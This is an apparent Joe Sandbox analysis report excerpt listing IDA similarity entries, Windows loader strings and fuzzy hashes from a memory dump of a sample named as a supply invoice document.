                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: #%u
                                                                                                                                • API String ID: 48624451-232158463
                                                                                                                                Strings
                                                                                                                                • LdrResSearchResource Exit, xrefs: 0170AA25
                                                                                                                                • LdrResSearchResource Enter, xrefs: 0170AA13
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                • API String ID: 0-4066393604
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: `$`
                                                                                                                                • API String ID: 0-197956300
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID: Legacy$UEFI
                                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$MUI
                                                                                                                                • API String ID: 0-17815947
                                                                                                                                Strings
                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0170063D
                                                                                                                                • kLsE, xrefs: 01700540
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                • API String ID: 0-2547482624
                                                                                                                                Strings
                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0170A2FB
                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0170A309
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                • API String ID: 0-2876891731
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: NwB$NwB(
                                                                                                                                • API String ID: 0-1271276979
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                                                • API String ID: 2994545307-4008356553
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: MUI
                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: GlobalTags
                                                                                                                                • API String ID: 0-1106856819
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .mui
                                                                                                                                • API String ID: 0-1199573805
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: EXT-
                                                                                                                                • API String ID: 0-1948896318
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: BinaryHash
                                                                                                                                • API String ID: 0-2202222882
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #
                                                                                                                                • API String ID: 0-1885708031
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: BinaryName
                                                                                                                                • API String ID: 0-215506332
                                                                                                                                Strings
                                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0178895E
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                • API String ID: 0-702105204
                                                                                                                                • Opcode ID: 171caa5f60afc57610ef6b85baf29a8ad9118bbd02c26c90582b54d6060dbffd
                                                                                                                                • Instruction ID: 9c5b679add9202dcc16ee14aea5ae02d5a0aef5e7e1c94afd6768d3987ae1630
                                                                                                                                • Opcode Fuzzy Hash: 171caa5f60afc57610ef6b85baf29a8ad9118bbd02c26c90582b54d6060dbffd
                                                                                                                                • Instruction Fuzzy Hash: 110126762883019BE7317B5ACC88B6BFFA9EF81364B44012CF7811A156CF20A840C797
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b4e18927e14a5fe76b4c4a67d188ead4bd5aa25c2061710926e4945aa430b8f4
                                                                                                                                • Instruction ID: e4aad7cec1895816675f879136637580fb6542a4a9d733707840129f437ab6e1
                                                                                                                                • Opcode Fuzzy Hash: b4e18927e14a5fe76b4c4a67d188ead4bd5aa25c2061710926e4945aa430b8f4
                                                                                                                                • Instruction Fuzzy Hash: DCA1BE70B016169BDB25DF69C994BAAF7B1FF44328F104129EB05DB282EB34E811CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9c5b938d3bd68b14b382ff266fa6908dd26159dd385661379b8a71bba9e54f4a
                                                                                                                                • Instruction ID: 2cfce50a58875c26c12542da79ee6daa0e329486426f89f546c805d041220019
                                                                                                                                • Opcode Fuzzy Hash: 9c5b938d3bd68b14b382ff266fa6908dd26159dd385661379b8a71bba9e54f4a
                                                                                                                                • Instruction Fuzzy Hash: EAA1C972A04206AFC722DF18C984B2AFBF9FF48754F150928F58A9BA55D330E900CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                • Instruction ID: e3b1cb26fd8c096fad9c0a6de513ec7bf87c6c951d302c831bbe95e8873edc43
                                                                                                                                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                • Instruction Fuzzy Hash: C2B11971E0061ADFDF29CFA9C880AADFBB5FF48310F148169E915A7356D730A946CB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 483afce738c043530a58b650e338056b924329180e9b1885a54f73f95534633e
                                                                                                                                • Instruction ID: 34fb5bc67ca829b6c11cf9d842d8f3aa4bd63934d1f28368715dc865de743e84
                                                                                                                                • Opcode Fuzzy Hash: 483afce738c043530a58b650e338056b924329180e9b1885a54f73f95534633e
                                                                                                                                • Instruction Fuzzy Hash: B391C071D40216BFDB15EFA8D884BAEFFB5AB48710F1541A9F610EB345D734E9009BA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 37d56b5007d2aa3179b8fc4b325cb2facdf47a4b3b87f485019b468648bc85d1
                                                                                                                                • Instruction ID: fb26a004178b57e28be7254e8682c7229cada47b4c49f88caac38235423c3832
                                                                                                                                • Opcode Fuzzy Hash: 37d56b5007d2aa3179b8fc4b325cb2facdf47a4b3b87f485019b468648bc85d1
                                                                                                                                • Instruction Fuzzy Hash: 08913471A00212CFEB26DB6CC884B7EFBB5EF94714F2580A9EE059B349EA34D941C751
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 289ed07118d18eceeb1ef8f5f49a88d1da26f61c019a854db3dd565e80a12498
                                                                                                                                • Instruction ID: ee77cf0acf567c60df56e83df41f5b695e3bf0619db1d25552435c864c92ab28
                                                                                                                                • Opcode Fuzzy Hash: 289ed07118d18eceeb1ef8f5f49a88d1da26f61c019a854db3dd565e80a12498
                                                                                                                                • Instruction Fuzzy Hash: 2281A271E006169BDB68CF69C940ABEFBF9FB48700F54852EE845E7640E774E940CBA4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                • Instruction ID: 50559d20320d53766b0e260b6ad0a59367743853dbe85830a25623bde41758d4
                                                                                                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                • Instruction Fuzzy Hash: 6C819231A0020A9FDF19CF98C894AAEFBB2FF84711F14856DD9169B349EB74E941CB40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a7b3228a0c7c13807e329fda34996fdd237b93cc04a78b4107191e119a86d7d8
                                                                                                                                • Instruction ID: e5a1e8641521cbd73c05cd82ab2836c37dd5263f05139c3958f1ab554f4258fc
                                                                                                                                • Opcode Fuzzy Hash: a7b3228a0c7c13807e329fda34996fdd237b93cc04a78b4107191e119a86d7d8
                                                                                                                                • Instruction Fuzzy Hash: 9A814F71A01609AFDB26CFA9C880BEEFBB9FF88354F144429E555A7251DB30AC45CB60
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7994f3042f155499e08980668fb5b390a7b316e63ea80d7605cc27ffcbf99276
                                                                                                                                • Instruction ID: c16b63643c7e9bdf6f5bd09e36b8e12c42c96dc2d13b5ae72b030ea3cb44e71e
                                                                                                                                • Opcode Fuzzy Hash: 7994f3042f155499e08980668fb5b390a7b316e63ea80d7605cc27ffcbf99276
                                                                                                                                • Instruction Fuzzy Hash: E871ACB5D04629DBCB26CF98D9907BEFBB4FF68710F14815AE942AB354D3709840CBA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8cf0d2f4d2e326fc63135bdd0b718ca9bc7c6bcb7119d2ca1a2ed6cc6595e33c
                                                                                                                                • Instruction ID: 9cabe81d5136d850519b89ed0125765eb21bec7d6aa6ec44821e65d6f155ece7
                                                                                                                                • Opcode Fuzzy Hash: 8cf0d2f4d2e326fc63135bdd0b718ca9bc7c6bcb7119d2ca1a2ed6cc6595e33c
                                                                                                                                • Instruction Fuzzy Hash: 44714F70900205EFDB20DF69D984B9BFBF9FF94710B10815EF616AB29AD7319A80CB54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5bea29e2365b334d529afbb3c25cce22f6279f17d975e79f789f90b9a8126883
                                                                                                                                • Instruction ID: 99d1bedf9b3c4163c0eeb06cf2159b00ecc631b9ca2105e5542decf5b76baff8
                                                                                                                                • Opcode Fuzzy Hash: 5bea29e2365b334d529afbb3c25cce22f6279f17d975e79f789f90b9a8126883
                                                                                                                                • Instruction Fuzzy Hash: B371CF316042428FD312DF2CC484B6AF7E5FF84710F1489AAE899CB79ADB34D946CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                • Instruction ID: bd5cfff25251d3f4a39021122cf67e17fad37dda0e4090d1e5600d1f5578f8ba
                                                                                                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                • Instruction Fuzzy Hash: F5716E71E40619AFDB10EFA9C944E9EFBB9FF48710F104569E505A7254DB30EA05CBA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 779a934f00c2ba065e6c8aacdde6395cd6e2da8c502bfbcfc126f7cd4bc7ff82
                                                                                                                                • Instruction ID: 808e3dd7e367092b75551fb922a73e1b381ceb74b1a4bd8a668750aad2398f97
                                                                                                                                • Opcode Fuzzy Hash: 779a934f00c2ba065e6c8aacdde6395cd6e2da8c502bfbcfc126f7cd4bc7ff82
                                                                                                                                • Instruction Fuzzy Hash: C471F332240B01AFEB32DF58D844F5AFBA6EF44760F154A28F2558B2A1D775E948CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 28eed0c745bd21a56208f9b36ebfc4180575cc36b2e59dc97777529496321b66
                                                                                                                                • Instruction ID: 2077be0d47647c9a82108629f37936c71c968d25ce82f686d2d34bb8d17a4893
                                                                                                                                • Opcode Fuzzy Hash: 28eed0c745bd21a56208f9b36ebfc4180575cc36b2e59dc97777529496321b66
                                                                                                                                • Instruction Fuzzy Hash: 9F818D72A08706CFDB25CF9CD488BAEF7F5AB48320F1A416DD905AB286D7749D40CB94
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bc1bd777f0419019d091498fdf8bac0f4031afe8f5cc4535c20e63485976474d
                                                                                                                                • Instruction ID: 95d3018e74ff904fd6dce169ce5007e426582a79b2bceaf0da9de32df5791529
                                                                                                                                • Opcode Fuzzy Hash: bc1bd777f0419019d091498fdf8bac0f4031afe8f5cc4535c20e63485976474d
                                                                                                                                • Instruction Fuzzy Hash: 88712971E0020AAFDF16DF94C845FEEFBB8FB04350F104269F625A6294E774AA05CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: be03cf9397151ec9a24f0c186e7e9d9892a7b5dbd0f63fbd49075e437b7ab5d8
                                                                                                                                • Instruction ID: a5e4007127f5d78264ed5d88bc312fa93305c11660183544246550d144a91eae
                                                                                                                                • Opcode Fuzzy Hash: be03cf9397151ec9a24f0c186e7e9d9892a7b5dbd0f63fbd49075e437b7ab5d8
                                                                                                                                • Instruction Fuzzy Hash: 3F51B072504712AFD722EE68C888F9BFBE8EBC5750F010929BA41DB254D774ED05C7A2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a78ee39bb4521c77f460e72a6a0398f3b94781f4cb165ecbebf19df5e4d35ff5
                                                                                                                                • Instruction ID: f55a6b2ece97e0c5e702a7677af9c9b68bf640020e86cfd6cea01798277412f7
                                                                                                                                • Opcode Fuzzy Hash: a78ee39bb4521c77f460e72a6a0398f3b94781f4cb165ecbebf19df5e4d35ff5
                                                                                                                                • Instruction Fuzzy Hash: 8851DF70900705DFD721CFAAC884AABFBF8BF94710F50471EE292976A1D7B0A545CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 78dfb68efb2a7047b9b2c599779d4c29d823840b71607a67d40059aec9b06e99
                                                                                                                                • Instruction ID: f3e8e62940a83250cb001971d7d65735ecdac0d0d02cdd1b8e9a6c4c22780ba4
                                                                                                                                • Opcode Fuzzy Hash: 78dfb68efb2a7047b9b2c599779d4c29d823840b71607a67d40059aec9b06e99
                                                                                                                                • Instruction Fuzzy Hash: 78518E71200A05DFCB22EF69C984E6AF3F9FF58764F500869E652972A5EB30ED50CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e5c09b469f35cb1a9773b04c32f0ad579ffd200bd5564657117c4f1ee0166fa1
                                                                                                                                • Instruction ID: 5e3c645021e5f4a388a7f6ba93a7538779f0becc4c385aa720ba93a3ea6c144e
                                                                                                                                • Opcode Fuzzy Hash: e5c09b469f35cb1a9773b04c32f0ad579ffd200bd5564657117c4f1ee0166fa1
                                                                                                                                • Instruction Fuzzy Hash: 715178716083429FD754DF29C880A6BFBE5BFC8204F884A2DF58AD7250EB71D905CB52
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                • Instruction ID: 15d9036c8e9e1283e41b0ac916d65212cfdb873b8b9646d4d0eab5d018269d02
                                                                                                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                • Instruction Fuzzy Hash: F0518E71E0022AABDF15DF98C444BEEFBB9AF45754F044069EA12AB340D774DE46CBA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                • Instruction ID: c2da005217fa9d870a930ee6ab29c444a61e2cb4ff2c81ca40208f19ca2db028
